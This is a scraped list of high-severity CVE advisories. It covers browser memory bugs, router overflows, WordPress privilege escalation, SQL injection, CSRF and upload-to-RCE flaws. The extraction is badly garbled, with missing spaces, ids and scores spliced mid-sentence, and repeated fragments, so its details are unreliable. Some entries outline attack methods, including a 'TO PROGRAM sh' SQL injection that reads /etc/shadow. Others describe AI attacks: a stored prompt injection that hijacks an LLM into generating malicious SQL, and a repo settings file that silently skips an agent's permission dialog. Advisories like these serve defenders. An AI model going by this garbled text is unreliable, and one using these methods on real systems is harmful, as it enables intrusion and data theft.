More2026- 8.8 heapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4457 CVE- VitalsESPdevelopedbyGalaxySoftwareServiceshasaIncorrectAuthorizationvulnerability,allowing More2026- 8.8 authenticatedremoteattackerstoperformcertainadministrativefunctions,therebyescalatingprivileges. Details4639 CVE- UseafterfreeinExtensionsinGoogleChromepriorto146.0.7680.153allowedanattackerwhoconvincedauser More2026- toinstallamaliciousextensiontopotentiallyexploitheapcorruptionviaacraftedChromeExtension.(Chromium 8.8 Details4458 securityseverity:High) ClipBucketv5isanopensourcevideosharingplatform.Anauthenticatedtime-basedblindSQLinjectionCVE- vulnerabilityexistsinClipBucketpriorto5.5.3#80withintheactions/ajax.phpendpoint.Duetoinsufficient More2026- 8.8 inputsanitizationoftheuseridparameter,anauthenticatedattackercanexecutearbitrarySQLqueries,leading Details32321 tofulldatabasedisclosureandpotentialadministrativeaccounttakeover.Version5.5.3#80fixestheissue. ClaudeCodeisanagenticcodingtool.Versionspriorto2.1.53resolvedthepermissionmodefromsettingsfiles, includingtherepo-controlled.claude/settings.json,beforedeterminingwhethertodisplaytheworkspacetrust CVE- confirmationdialog.Amaliciousrepositorycouldsetpermissions.defaultModetobypassPermissionsinits More2026- committed.claude/settings.json,causingthetrustdialogtobesilentlyskippedonfirstopen.Thisallowedauser 8.8 Details33068 tobeplacedintoapermissivemodewithoutseeingthetrustconfirmationprompt,makingiteasierforan attacker-controlledrepositorytogaintoolexecutionwithoutexplicituserconsent.Thisissuehasbeenpatchedin version2.1.53. AvulnerabilitywasidentifiedinD-LinkDHP-13201.00WWB04.ThisaffectsthefunctionredirectcountdownpageCVE- ofthecomponentSOAPHandler.Suchmanipulationleadstostack-basedbufferoverflow.Theattackcanbe More2026- 8.8 executedremotely.Theexploitispubliclyavailableandmightbeused.Thisvulnerabilityonlyaffectsproducts Details4529 thatarenolongersupportedbythemaintainer. The'TheUltimateWordPressToolkit–WPExtended'pluginforWordPressisvulnerabletoPrivilegeEscalationin allversionsupto,andincluding,3.2.4.ThisisduetotheisDashboardOrProfileRequest()methodintheMenu Editormoduleusinganinsecurestrpos()checkagainst`$SERVER['REQUESTURI']todetermineifarequest CVE- targetsthedashboardorprofilepage.ThegrantVirtualCaps()method,whichishookedintotheuserhascapMore 8.8 filter,grantselevatedcapabilitiesincludingmanageoptions`whenthischeckreturnstrue.Thismakesitpossible Details forauthenticatedattackers,withSubscriber-levelaccessandabove,togainadministrativecapabilitiesby appendingacraftedqueryparametertoanyadminURL,allowingthemtoupdatearbitraryWordPressoptionsand appendingacraftedqueryparametertoanyadminURL,allowingthemtoupdatearbitraryWordPressoptionsand ultimatelycreatenewAdministratoraccounts.
CVE- ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinlinkingvision More 8.8 rapidvms.Thisissueaffectsrapidvms:beforePR#96. Details33848 CVE- AflawhasbeenfoundinTendaFH4511.0.0.9.ThisaffectsthefunctionformWrlExtraSetofthefile More2026- /goform/WrlExtraSet.ThismanipulationoftheargumentGOcausesstack-basedbufferoverflow.Theattackcan 8.8 Details4534 beinitiatedremotely.Theexploithasbeenpublishedandmaybeused. CVE- OutofboundsreadinSkiainGoogleChromepriorto146.0.7680.153allowedaremoteattackertoperformanout More2026- 8.8 ofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4460 CVE- UseafterfreeinFedCMinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoexecutearbitrary More2026- 8.8 codeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4680 CVE- AvulnerabilityhasbeenfoundinTendaFH4511.0.0.9.ThisvulnerabilityaffectsthefunctionWrlclientSetofthe More2026- file/goform/WrlclientSet.SuchmanipulationoftheargumentGOleadstostack-basedbufferoverflow.Theattack 8.8 Details4535 canbelaunchedremotely.Theexploithasbeendisclosedtothepublicandmaybeused. CVE- IntegeroverflowinFontsinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoperformanout More2026- 8.8 ofboundsmemorywriteviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4679 CVE- UseafterfreeinWebGPUinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoexecute More2026- 8.8 arbitrarycodeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4678 CVE- InappropriateimplementationinWebAudioinGoogleChromepriorto146.0.7680.165allowedaremoteattacker More2026- 8.8 toperformanoutofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4677
DNAsequencealignmentdata.WhilemostalignmentrecordsstoreDNAsequenceandqualityvalues,theformat alsoallowsthemtoomitthisdataincertaincasestosavespace.DuetosomequirksoftheCRAMformat,itis necessarytohandletheserecordscarefullyastheywillactuallystoredatathatneedstobeconsumedandthenCVE-discarded.Unfortunatelythecram_decode_seq()didnothandlethiscorrectlyinsomecases.Wherethis More2026- 8.8happeneditcouldresultinreadingasinglebytefrombeyondtheendofaheapallocation,followedbywritinga Details31962singleattacker-controlledbytetothesamelocation.Exploitingthisbugcausesaheapbufferoverflow.Ifauser opensafilecraftedtoexploitthisissue,itcouldleadtotheprogramcrashing,oroverwritingofdataandheap structuresinwaysnotexpectedbytheprogram.Itmaybepossibletousethistoobtainarbitrarycodeexecution. Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue. CVE-ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinlinkingvision More2026- 8.8rapidvms.Thisissueaffectsrapidvms:beforePR#96. Details33849 CVE-UseafterfreeinBlinkinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentiallyexploit More2026- 8.8heapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4449 Jenkins2.554andearlier,LTS2.541.2andearlierdoesnotsafelyhandlesymboliclinksduringtheextractionof CVE-.tarand.tar.gzarchives,allowingcraftedarchivestowritefilestoarbitrarylocationsonthefilesystem,restricted More2026-onlybyfilesystemaccesspermissionsoftheuserrunningJenkins.Thiscanbeexploitedtodeploymalicious 8.8 Details33001scriptsorpluginsonthecontrollerbyattackerswithItem/Configurepermission,orabletocontrolagent processes. CVE-InsufficientvalidationofuntrustedinputinNavigationinGoogleChromepriorto146.0.7680.153allowedaremote More2026-attackerwhohadcompromisedtherendererprocesstopotentiallyperformasandboxescapeviaacraftedHTML 8.8 Details4451page.(Chromiumsecurityseverity:High) CVE-IntegeroverflowinANGLEinGoogleChromeonWindowspriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8 Details4452 TheExpireUserspluginforWordPressisvulnerabletoPrivilegeEscalationinallversionsupto,andincluding,CVE-1.2.2.Thisisduetothepluginallowingausertoupdatethe'onexpiredefaulttorole'metathroughthe More2026- 8.8'saveextrauserprofilefields'function.Thismakesitpossibleforauthenticatedattackers,withSubscriber-level Details accessandabove,toelevatetheirprivilegestothatofanadministrator. InJujufromversion3.0.0through3.6.18,theauthorizationofthe"secret-set"toolisnotperformedcorrectly,CVE- whichallowsagranteetoupdatethesecretcontent,andcanleadtoreadingorupdatingothersecrets.Whenthe 8.8 More 32693"secret-set"toollogsanerrorinanexploitationattempt,thesecretisstillupdatedcontrarytoexpectations,and Details 32693 "secret-set"toollogsanerrorinanexploitationattempt,thesecretisstillupdatedcontrarytoexpectations,and Details thenewvalueisvisibletoboththeownerandthegrantee. TheimportformCSRFvulnerabilityinMuraCMSthrough10.1.10allowsattackerstouploadandinstallmalicious formdefinitionsthroughaCSRFattack.ThevulnerablecForm.importformfunctionlacksCSRFtokenvalidation, enablingmaliciouswebsitestoforgefileuploadrequeststhatinstallattacker-controlledformswhenan authenticatedadministratorvisitsacraftedwebpage.FullexploitationofthisvulnerabilitywouldrequiretheCVE-victimtoselectamaliciousZIPfilecontainingformdefinitions,whichcanbeautomaticallygeneratedbythe More2025- 8.8exploitpageandusedtocreatedatacollectionformsthatstealsensitiveinformation.Successfulexploitationof Details55040theimportformCSRFvulnerabilitycouldresultintheinstallationofmaliciousdatacollectionformsonthetarget MuraCMSwebsitethatcanstealsensitiveuserinformation.Whenanauthenticatedadministratorvisitsa maliciouswebpagecontainingtheCSRFexploitandselectstheattacker-generatedZIPfile,theirbrowseruploads andinstallsformdefinitionsthatcreatelegitimateformsthatcouldbedesignedwithmaliciouscontent. TheTrashRestoreCSRFvulnerabilityinMuraCMSthrough10.1.10allowsattackerstorestoredeletedcontent fromthetrashtounauthorizedlocationsthroughCSRF.ThevulnerablecTrash.restorefunctionlacksCSRFtoken validation,enablingmaliciouswebsitestoforgerequeststhatrestorecontenttoarbitraryparentlocationswhen anauthenticatedadministratorvisitsacraftedwebpage.SuccessfulexploitationoftheTrashRestoreCSRF CVE-vulnerabilityresultsinunauthorizedrestorationofdeletedcontenttopotentiallyinappropriateormalicious More2025-locationswithintheMuraCMSwebsitestructure.Whenanauthenticatedadministratorvisitsamaliciouswebpage 8.8 Details55044containingtheCSRFexploit,theirbrowserautomaticallysubmitsahiddenformthatrestoresspecifiedcontent fromthetrashtoalocationdeterminedbytheattackerthroughtheparentidparameter.Thiscanleadto restorationofpreviouslydeletedmaliciouscontent,placementofsensitivedocumentsinpublicareas, manipulationofwebsitenavigationstructure,orrestorationofoutdatedcontentthatwasintentionallyremoved forsecurityorcompliancereasons. CVE-UseafterfreeinNetworkinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8 Details4454 PhreeBooksERP5.2.3containsaremotecodeexecutionvulnerabilityintheimagemanagerthatallowsCVE-authenticatedattackerstouploadandexecutearbitraryPHPfilesbybypassingfileextensioncontrols.Attackers More2019- 8.8canuploadmaliciousPHPfilesthroughtheimagemanagerendpointandexecutethemtoestablishreverseshell Details25647connectionsandexecutesystemcommands. CVE-Out-of-boundsWritevulnerabilityinMolotovCherryAndroid-ImageMagick7.ThisissueaffectsAndroid- More2026- 8.8ImageMagick7:before7.1.2-10. Details33854 ThePhotoGallery,Sliders,ProofingandThemes–NextGENGallerypluginforWordPressisvulnerabletoLocalFile Inclusioninallversionsupto,andincluding,4.0.3viathe'template'parameteringalleryshortcodes.ThismakesCVE-itpossibleforauthenticatedattackers,withAuthor-levelaccessandabove,toincludeandexecutearbitrary.php More2026- 8.8filesontheserver,allowingtheexecutionofanyPHPcodeinthosefiles.Thiscanbeusedtobypassaccess Details1463controls,obtainsensitivedata,orachievecodeexecutionincaseswhere.phpfiletypescanbeuploadedand included. CVE-HeapbufferoverflowinPDFiuminGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8potentiallyexploitheapcorruptionviaacraftedPDFfile.(Chromiumsecurityseverity:High) Details4455 PhreeBooksERP5.2.3containsanarbitraryfileuploadvulnerabilityintheImageManagercomponentthatallowsCVE-authenticatedattackerstouploadmaliciousfilesbysubmittingrequeststotheimageuploadendpoint.Attackers More2019- 8.8canuploadPHPfilesthroughtheimgFileparametertothebizuno/image/managerendpointandexecutethemvia Details25630thebizunoFS.phpscriptforremotecodeexecution. CVE-Alow-privilegedremoteattackermaybeabletoreplacethebootapplicationoftheCODESYSControlruntime More2025- 8.8system,enablingunauthorizedcodeexecution. Details41660 CVE-UseafterfreeinDigitalCredentialsAPIinGoogleChromepriorto146.0.7680.153allowedaremoteattackerwho More2026-hadcompromisedtherendererprocesstopotentiallyperformasandboxescapeviaacraftedHTMLpage. 8.8 Details4456(Chromiumsecurityseverity:High) FastGPTisanAIAgentbuildingplatform.Inversions4.14.8.3andbelow,thefastgpt-preview-image.ymlworkflow CVE-isvulnerabletoarbitrarycodeexecutionandsecretexfiltrationbyanyexternalcontributor.Ituses More2026-pullrequesttarget(whichrunswithaccesstorepositorysecrets)butchecksoutcodefromthepullrequest 8.8 Details33075author'sfork,thenbuildsandpushesDockerimagesusingattacker-controlledDockerfiles.Thisalsoenablesa supplychainattackviatheproductioncontainerregistry.Apatchwasnotavailableatthetimeofpublication.
Priortoversions7.15.1and8.9.3,theretrieve()functionininclude/OutboundEmail/OutboundEmail.phpfailsto properlyneutralizetheusercontrolled$idparameter.Itisassumedthatthefunctioncallingretrieve()will appropriatelyquoteandsanitizetheuserinput.However,twolocationshavebeenidentifiedthatcanbereachedCVE- MorethroughtheEmailUIAjaxactionontheEmail()modulewherethisisnotthecase.Assuch,itispossibleforan 8.8 authenticatedusertoperformSQLinjectionthroughtheretrieve()function.Thisaffectsthelatestmajor Details29099 versions7.15and8.9.Astheredonotappeartoberestrictionsonwhichtablescanbecalled,itwouldbepossible versions7.15and8.9.Astheredonotappeartoberestrictionsonwhichtablescanbecalled,itwouldbepossible foranattackertoretrievearbitraryinformationfromthedatabase,includinguserinformationandpassword hashes.Versions7.15.1and8.9.3patchtheissue. CVE-UseafterfreeinDawninGoogleChromepriorto146.0.7680.165allowedaremoteattackertopotentiallyperform More 8.8asandboxescapeviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4676 CVE-HeapbufferoverflowinWebGLinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoperform More2026- 8.8anoutofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4675 CVE-InappropriateimplementationinV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8 Details4461 WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,therestreamerendpoint constructsalogfilepathbyembeddinguser-controlledusers_idandliveTransmitionHistory_idvaluesfromtheCVE-JSONrequestbodywithoutanysanitization.Thislogfilepathisthenconcatenateddirectlyintoshellcommands More2026- 8.8passedtoexec(),allowinganauthenticatedusertoachievearbitrarycommandexecutionontheserverviashell Details33648metacharacterssuchas$()orbackticks.Commit99b865413172045fef6a98b5e9bfc7b24da11678containsa patch. BMCFootPrintsITSMversions20.20.02through20.24.01.001containadeserializationofuntrusteddata CVE-vulnerabilityintheASP.NETservlet'sVIEWSTATEhandlingthatallowsauthenticatedattackerstoexecutearbitrary More2025-code.AttackerscansupplycraftedserializedobjectstotheVIEWSTATEparametertoachieveremotecode 8.8 Details71260executionandfullycompromisetheapplication.Thefollowinghotfixesremediatethevulnerability:20.20.02, 20.20.03.002,20.21.01.001,20.21.02.002,20.22.01,20.22.01.001,20.23.01,20.23.01.002,and20.24.01. CVE-DevomeGRRv4.5.0wasdiscoveredtocontainmultipleauthenticatedSQLinjectionvulnerabilitiesinthe More2026- 8.8include/session.inc.phpfileviatherefereranduser-agent. Details30711 AweaknesshasbeenidentifiedinD-LinkDIR-5131.10.Theimpactedelementisthefunction CVE-formEasySetTimezoneofthefile/goform/formEasySetTimezoneofthecomponentboa.Thismanipulationofthe More2026-argumentcurTimecausesstack-basedbufferoverflow.Theattackcanbeinitiatedremotely.Theexploithasbeen 8.8 Details4555madeavailabletothepublicandcouldbeusedforattacks.Thisvulnerabilityonlyaffectsproductsthatareno longersupportedbythemaintainer. BlinkoisanAI-poweredcardnote-takingproject.Priortoversion1.8.4,thereisaprivilegeescalationvulnerability. TheupsertUserendpointhas3issues:itismissingsuperAdminAuthMiddleware,anylogged-inusercancallit;theCVE-originalPasswordisanoptionalparameterandifnotprovidedpasswordverificationisskipped;thereisnocheck More2026- 8.8forinput.id===ctx.id(ownershipverification).Thiscouldresultinanyauthenticatedusermodifyingotherusers' Details23480passwords,directescalationtosuperadmin,andcompleteaccounttakeover.Thisissuehasbeenpatchedin version1.8.4. AflawhasbeenfoundinLinksysMR96002.0.6.206937.AffectedisthefunctionsmartConnectConfigureofthefile CVE-SmartConnect.lua.Executingamanipulationoftheargument More2026-configApSsid/configApPassphrase/srpLogin/srpPasswordcanleadtooscommandinjection.Theattackmaybe 8.8 Details4558launchedremotely.Theexploithasbeenpublishedandmaybeused.Thevendorwascontactedearlyaboutthis
downloadVideoFromDownloadURL()functioninobjects/aVideoEncoder.json.phpsavesremotecontenttoaCVE-web-accessibletemporarydirectoryusingtheoriginalURL'sfilenameandextension(including.php).By More2026- 8.8providinganinvalidresolutionparameter,anattackertriggersanearlydie()viaforbiddenPage()beforethe Details33717tempfilecanbemovedorcleanedup,leavinganexecutablePHPfilepersistentlyaccessibleunderthewebroot atvideos/cache/tmpFile/.Commit6da79b43484099a0b660d1544a63c07b633ed3a2containsapatch. AVideoisavideo-sharingPlatform.Versionspriorto8.0containaSQLInjectionvulnerabilityinthe getSqlFromPost()methodofObject.php.The$POST['sort']arraykeysareuseddirectlyasSQLcolumnidentifiers CVE-insideanORDERBYclause.Althoughrealescapestring()wasapplied,itonlyescapesstring-contextcharacters More2026-(quotes,nullbytes)andprovidesnoprotectionforSQLidentifiers—makingitentirelyineffectivehere.Thisissue 8.8 Details33025hasbeenfixedinversion8.0.Toworkaroundthisissuewithoutupgrading,operatorscanapplyaWAFruleto blockPOSTrequestswhereanysort[*]keycontainscharactersoutside[A-Za-z0-9].Alternatively,restrictaccess tothequeueview(queue.json.php,index.php)totrustedIPrangesonly.
ImageGallery::saveFile()methodvalidatesuploadedfilecontentusingfinfoMIMEtypedetectionbutderivesCVE-thesavedfilenameextensionfromtheuser-suppliedoriginalfilenamewithoutanallowlistcheck.Anattackercan More2026- 8.8uploadapolyglotfile(validJPEGmagicbytesfollowedbyPHPcode)witha.phpextension.TheMIMEcheck Details33647passes,butthefileissavedasanexecutable.phpfileinaweb-accessibledirectory,achievingRemoteCode Execution.Commit345a8d3ece0ad1e1b71a704c1579cbf885d8f3aecontainsapatch. CVE-OutofboundsreadinCSSinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoperformoutof More 8.8 8.8boundsmemoryaccessviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details OpenClawversions2026.2.22priorto2026.2.25containaprivilegeescalationvulnerabilityallowingunpairedCVE-deviceidentitiestobypassoperatorpairingrequirementsandself-assignelevatedoperatorscopesincluding More 8.8operator.admin.Attackerswithvalidsharedgatewayauthenticationcanpresentaself-signedunpaireddevice Details32042identitytorequestandobtainhigheroperatorscopesbeforepairingapprovalisgranted. CVE-AvulnerabilitywasdetectedinTendaAC2116.03.08.16.ImpactedisthefunctionformSetQosBandofthefile More2026-/goform/SetNetControlList.Performingamanipulationoftheargumentlistresultsinbufferoverflow.Theattack 8.8 Details4565canbeinitiatedremotely.Theexploitisnowpublicandmaybeused. AflawhasbeenfoundinBelkinF9K11221.00.33.TheaffectedelementisthefunctionformWISP5GofthefileCVE-/goform/formWISP5G.Executingamanipulationoftheargumentwebpagecanleadtostack-basedbuffer More2026- 8.8overflow.Theattackcanbelaunchedremotely.Theexploithasbeenpublishedandmaybeused.Thevendorwas Details4566
objects/pluginImport.json.phpendpointallowsadminuserstouploadandinstallpluginZIPfilescontainingCVE-executablePHPcode,butlacksanyCSRFprotection.Combinedwiththeapplicationexplicitlysetting More2026- 8.8session.cookie_samesite='None'forHTTPSconnections,anunauthenticatedattackercancraftapagethat, Details33507whenvisitedbyanauthenticatedadmin,silentlyuploadsamaliciousplugincontainingaPHPwebshell,achieving RemoteCodeExecutionontheserver.Commitd1bc1695edd9ad4468a48cea0df6cd943a2635f3containsapatch. AcommandinjectionvulnerabilityexistsinDigitalOceanDropletAgentthrough1.3.2.Thetroubleshooting actionercomponent(internal/troubleshooting/actioner/actioner.go)processesmetadatafromthemetadata serviceendpointandexecutescommandsspecifiedintheTroubleshootingAgent.Requestingarraywithout adequateinputvalidation.WhilethecodevalidatesthatartifactsexistinthevalidInvestigationArtifactsmap,it failstosanitizetheactualcommandcontentafterthe"command:"prefix.ThisallowsanattackerwhocancontrolCVE-metadataresponsestoinjectandexecutearbitraryOScommandswithrootprivileges.Theattackistriggeredby More2026- 8.8sendingaTCPpacketwithspecificsequencenumberstotheSSHport,whichcausestheagenttofetchmetadata Details24516fromhttp://169.254.169.254/metadata/v1.json.Thevulnerabilityaffectsthecommandexecutionflowin internal/troubleshooting/actioner/actioner.go(insufficientvalidation),internal/troubleshooting/command/exec.go (directexec.CommandContextcall),andinternal/troubleshooting/command/command.go(commandparsing withoutsanitization).Thiscanleadtocompletesystemcompromise,dataexfiltration,privilegeescalation,and potentiallateralmovementacrosscloudinfrastructure. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theGalleryplugin's saveSort.json.phpendpointpassesunsanitizeduserinputfrom$_REQUEST['sections']arrayvaluesdirectlyCVE-intoPHP'seval()function.WhiletheendpointisgatedbehindUser::isAdmin(),ithasnoCSRFtokenvalidation. More2026- 8.8CombinedwithAVideo'sexplicitSameSite=Nonesessioncookieconfiguration,anattackercanexploitthisvia Details33479cross-siterequestforgerytoachieveunauthenticatedremotecodeexecution—requiringonlythatanadminvisits anattacker-controlledpage.Commit087dab8841f8bdb54be184105ef19b47c5698fcbcontainsapatch. SQLBotisanintelligentdataquerysystembasedonalargelanguagemodelandRAG.Versions1.5.0andbelow containaStoredPromptInjectionvulnerabilitythatchainsthreeflaws:amissingpermissioncheckontheExcel CVE-uploadAPIallowinganyauthenticatedusertouploadmaliciousterminology,unsanitizedstorageofterminology More2026-descriptionscontainingdangerouspayloads,andalackofsemanticfencingwheninjectingterminologyintothe 8.8 Details32622LLM'ssystemprompt.Together,theseflawsallowanattackertohijacktheLLM'sreasoningtogeneratemalicious PostgreSQLcommands(e.g.,COPY...TOPROGRAM),ultimatelyachievingRemoteCodeExecutiononthe databaseorapplicationserverwithpostgresuserprivileges.Theissueisfixedinv1.6.0. OpenClawversionspriorto2026.2.25containasymlinktraversalvulnerabilityintheagents.files.getandCVE-agents.files.setmethodsthatallowsreadingandwritingfilesoutsidetheagentworkspace.Attackerscanexploit More2026- 8.8symlinkedallowlistedfilestoaccessarbitraryhostfileswithingatewayprocesspermissions,potentiallyenabling Details32013codeexecutionthroughfileoverwriteattacks. OpenClawversionspriorto2026.3.1containanauthorizationmismatchvulnerabilitythatallowsauthenticatedCVE-callerswithoperator.writescopetoinvokeowner-onlytoolsurfacesincludinggatewayandcronthroughagent More2026- 8.8runsinscoped-tokendeployments.Attackerswithwrite-scopeaccesscanperformcontrol-planeactionsbeyond Details32051theirintendedauthorizationlevelbyexploitinginconsistentowner-onlygatingduringagentexecution. CVE-DeserializationofUntrustedDatavulnerabilityinMembershipSoftwareWishListMemberXallowsObject More2026- 8.8Injection.ThisissueaffectsWishListMemberX:fromn/athrough3.29.0. Details25445 AvulnerabilitywasidentifiedinTendaF4531.0.0.3.ImpactedisthefunctionfromNatlimitofthefileCVE-/goform/NatlimitofthecomponentParametersHandler.Themanipulationoftheargumentpageleadstostack- More2026- 8.8basedbufferoverflow.Itispossibletoinitiatetheattackremotely.Theexploitispubliclyavailableandmightbe Details4553used. CVE- HeapbufferoverflowinWebAudioinGoogleChromepriorto146.0.7680.165allowedaremoteattackerto More 8.8performanoutofboundsmemorywriteviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details CVE- CVE-OutofboundsreadinBlinkinGoogleChromepriorto146.0.7680.153allowedaremoteattackertoperforman More 8.8outofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details CVE-HeapbufferoverflowinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More 8.8 Details4463 CVE-IntegeroverflowinANGLEinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8exploitheapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:Medium) Details4464 TheJupiterXCorepluginforWordPressisvulnerabletolimitedfileuploadsduetomissingauthorizationon importpopuptemplates()functionaswellasinsufficientfiletypevalidationintheuploadfiles()functioninallCVE-versionsupto,andincluding,4.14.1.ThismakesitpossibleforAuthenticatedattackerswithSubscriber-level More2026- 8.8accessandabove,touploadfileswithdangeroustypesthatcanleadtoRemoteCodeExecutiononservers Details3533configuredtohandle.pharfilesasexecutablePHP(e.g.,Apache+modphp),orStoredCross-SiteScriptingvia .svg,.dfxp,or.xhtmlfilesuploadonanyserverconfiguration CVE-OutofboundsmemoryaccessinWebGLinGoogleChromeonAndroidpriorto146.0.7680.153allowedaremote More2026- 8.8attackertopotentiallyperformasandboxescapeviaacraftedHTMLpage.(Chromiumsecurityseverity:Critical) Details4439 IndicoisaneventmanagementsystemthatusesFlask-Multipass,amulti-backendauthenticationsystemfor Flask.Inversionspriorto3.3.12,duetovulnerabilitiesinTeXLiveandobscureLaTeXsyntaxthatallowed circumventingIndico'sLaTeXsanitizer,itispossibletousespecially-craftedLaTeXsnippetswhichcanreadlocal CVE-filesorexecutecodewiththeprivilegesoftheuserrunningIndicoontheserver.Notethatifserver-sideLaTeX More2026-renderingisnotinuse(ieXELATEX_PATHwasnotsetinindico.conf),thisvulnerabilitydoesnotapply.Itis 8.8 Details33046recommendedtoupdatetoIndico3.3.12assoonaspossible.Itisalsostronglyrecommendedtoenablethe containerizedLaTeXrenderer(usingpodman),whichisolatesitfromtherestofthesystem.Asaworkaround, removetheXELATEX_PATHsettingfromindico.conf(orcommentitoutorsetittoNone)andrestartthe indico-uwsgiandindico-celeryservicestodisableLaTeXfunctionality. AvulnerabilityhasbeenfoundinYiTechnologyYIHomeCamera22.1.120171024151200.TheaffectedelementCVE-isanunknownfunctionofthefilehome/web/ipc.Suchmanipulationleadstohard-codedcredentials.Accesstothe More2026- 8.8localnetworkisrequiredforthisattacktosucceed.Theexploithasbeendisclosedtothepublicandmaybeused. Details4475Thevendorwascontactedearlyaboutthisdisclosurebutdidnotrespondinanyway. CVE- More2026-versionsonthe2.xseriesuptoandincluding2.41.0,anauthenticatedusermaybeabletoexecutearbitrarycode 8.8 Details32276intheCodeStudyPlugin.Versions1.41.1and2.41.1containapatch. OpenSourcePointofSaleisawebbasedpoint-of-saleapplicationwritteninPHPusingCodeIgniterframework. CVE-VersionscontainanSQLInjectionintheItemssearchfunctionality.Whenthecustomattributesearchfeatureis More2026-enabled(searchcustomfilter),user-suppliedinputfromthesearchGETparameterisinterpolateddirectlyintoa 8.8 Details32888HAVINGclausewithoutparameterizationorsanitization.Thisallowsanauthenticatedattackerwithbasicitem searchpermissionstoexecutearbitrarySQLqueries.Apatchdidnotexistatthetimeofpublication. CVE-CensusCSWeb8.0.1allowsarbitraryfileupload.Aremote,authenticatedattackercoulduploadamaliciousfile, More2025- 8.8possiblyleadingtoremotecodeexecution.Fixedin8.1.0alpha. Details60947 LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Inversionspriorto1.9.0,theCVE-deleteapikeyroute()endpointacceptsanapikeyidpathparameteranddeletesitwithonlyageneric More2026- 8.8authenticationcheck(getcurrentactiveuserdependency).However,thedeleteapikey()CRUDfunctiondoes Details33053NOTverifythattheAPIkeybelongstothecurrentuserbeforedeletion. AvulnerabilitywasfoundinTendaF4531.0.0.3.ThisvulnerabilityaffectsthefunctionfromSafeClientFilteroftheCVE-file/goform/SafeClientFilterofthecomponentParametersHandler.Performingamanipulationoftheargument More2026- 8.8menufacturer/Goresultsinstack-basedbufferoverflow.Theattackispossibletobecarriedoutremotely.The Details4551exploithasbeenmadepublicandcouldbeused. CVE-CensusCSWeb8.0.1allowsarbitraryfilepathinput.Aremote,authenticatedattackercouldaccessunintendedfile More2025- 8.8directories.Fixedin8.1.0alpha. Details60946 AvulnerabilitywasdeterminedinTendaF4531.0.0.3.ThisissueaffectsthefunctionfromVirtualSerofthefileCVE-/goform/VirtualSerofthecomponentParametersHandler.Executingamanipulationoftheargumentpagecan More2026- 8.8leadtostack-basedbufferoverflow.Theattackmaybeperformedfromremote.Theexploithasbeenpublicly Details4552disclosedandmaybeutilized. CVE- OutofboundswriteinV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More 8.8 Details MicrosoftDynamics365CustomerEngagement(on-premises)1612(9.0.2.3034)allowsthegenerationof MicrosoftDynamics365CustomerEngagement(on-premises)1612(9.0.2.3034)allowsthegenerationof customizedreportsviarawSQLqueriesinanuploadofa.rdl(ReportDefinitionLanguage)file;thisisthen processedbytheSQLServerReportingService.AnaccountwiththeprivilegeAddReportingServicesReportscanCVE-uploadamaliciousrdlfile.Ifthemaliciousrdlfileisalreadyloadedanditisexecutablebytheuser,theAdd More 8.8ReportingServicesReportsprivilegeisnotrequired.Amaliciousactorcantriggerthegenerationofthereport, Details58112causingtheexecutionofarbitrarySQLcommandsintheunderlyingdatabase.Dependingonthepermissionsof theaccountrunningSQLServerReportingServices,theattackermaybeabletoperformadditionalactions,such asaccessinglinkedserversorexecutingoperatingsystemcommands. SQLBotisanintelligentdataquerysystembasedonalargelanguagemodelandRAG.Versionspriorto1.7.0 containacriticalSQLInjectionvulnerabilityinthe/api/v1/datasource/uploadExcelendpointthatenablesRemote CodeExecution(RCE),allowinganyauthenticateduser(eventhelowest-privileged)tofullycompromisethe backendserver.Therootcauseistwofold:ExcelSheetnamesareconcatenateddirectlyintoPostgreSQLtable CVE-nameswithoutsanitization(datasource.py#L351),andthosetablenamesareembeddedintoCOPYSQL More2026-statementsviaf-stringsinsteadofparameterizedqueries(datasource.py#L385-L388).Anattackercanbypassthe 8.8 Details3295031-characterSheetnamelimitusingatwo-stagetechnique—firstuploadinganormalfilewhosedatarowscontain shellcommands,thenuploadinganXML-tamperedfilewhoseSheetnameinjectsaTOPROGRAM'sh'clauseinto theSQL.Confirmedimpactsincludearbitrarycommandexecutionasthepostgresuser(uid=999),sensitivefile exfiltration(e.g.,/etc/passwd,/etc/shadow),andcompletePostgreSQLdatabasetakeover.Thisissuehasbeen fixedinversion1.7.0. TheCMSCommanderpluginforWordPressisvulnerabletoSQLInjectionviathe'orblogname', 'orblogdescription',and'oradminemail'parametersinallversionsupto,andincluding,2.288.ThisisduetoCVE-insufficientescapingontheusersuppliedparametersandlackofsufficientpreparationontheexistingSQL More2026- 8.8queriesintherestoreworkflow.Thismakesitpossibleforauthenticatedattackers,withCMSCommanderAPIkey 